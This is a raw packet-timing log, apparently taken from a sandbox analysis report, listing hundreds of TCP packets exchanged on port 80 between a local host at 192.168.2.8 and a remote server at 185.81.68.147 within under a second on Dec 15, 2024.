                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.050602913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.050676107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.050759077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.051457882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.051552057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.051631927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.052407980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.052520990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.052606106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.053275108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.053420067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.053503036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.054249048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.054373980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.054455996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.055139065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.055483103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.055567026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.056277990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.056293964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.056384087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.056977987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.057104111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.057190895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.057887077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.058008909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.058088064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.058815002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.058919907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.058998108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.059775114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.059850931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.059931993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.060640097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.071082115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.071104050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.071146011 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.071671963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.071687937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.071727991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.072626114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.072639942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.072675943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.073788881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.073851109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.074022055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.075716019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.075731039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.075773001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.076546907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.076613903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.076680899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.077512026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.077549934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.077564955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.077886105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.077931881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.077934027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.078439951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.078494072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.078502893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.079134941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.079200983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.079205036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.118540049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.214490891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.214546919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.214735031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.214850903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.214917898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.215336084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.215742111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.215837955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.215974092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.216665983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.216773987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.216876984 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.217602968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.217700958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.217804909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.218568087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.218661070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.218792915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.219404936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.219517946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.220349073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.220448017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.220453024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.221028090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.221229076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.221426964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.221540928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.222209930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.222301960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.222417116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.223088026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.223216057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.224018097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.224107027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.224129915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.224951982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.225040913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.225066900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.225083113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.225991964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.226119995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.226766109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.226807117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.226910114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.227025986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.227694988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.227798939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.227895975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.228617907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.228708982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.228822947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.229635954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.229705095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.229816914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.230632067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.230674028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.230768919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.231363058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.231517076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.232362986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.232450008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.232453108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.233226061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.233344078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.233366013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.233402014 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.234292030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.234349966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.234467983 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.235292912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.235443115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.235558987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.236022949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.236067057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.236155987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.236898899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.237009048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.237833977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.237915993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.237915993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.238744974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.238814116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.238841057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.239747047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.239833117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.239866018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.239887953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.240608931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.240712881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.240828037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.241498947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.241616964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.241734982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.242439985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.242573023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.242688894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.243335962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.243444920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.243545055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.244263887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.244376898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.244827986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.245237112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.245426893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.246330023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.246416092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.246469021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.247415066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.247498035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.247512102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.247536898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.248353958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.248490095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.248584032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.249125957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.249269962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.249360085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.250045061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.250117064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.250742912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.250808954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.250823975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.250861883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.251641035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.251739025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.251895905 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.252751112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.252890110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.253139973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.253699064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.263448954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.263521910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.263643026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.263855934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.263998032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.264101028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.264579058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.264647007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.264743090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.265681028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.265707016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.265806913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.266427040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.266484976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.266556025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.267358065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.267452002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.267488003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.268243074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.268382072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.268501997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.269198895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.269289017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.269293070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.270090103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.270164967 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.270198107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.271033049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.271100998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.271111965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.271945000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.272064924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.407207012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.407228947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.407387018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.407526016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.462057114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.479001045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.524580002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.526885033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.526902914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.527059078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.572025061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.618377924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643290997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643307924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643332005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643345118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643357992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643369913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643382072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643394947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643407106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643419981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643553972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643604994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643661022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643672943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643683910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643697023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643712044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643718004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643728018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643739939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643753052 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643755913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643770933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643784046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643785954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643805027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.643824100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.644520998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.644534111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.644546032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.644557953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.644576073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.644589901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.644602060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.644615889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.644623995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.644627094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.644640923 CET8049709185.81.68.147192.168.2.8
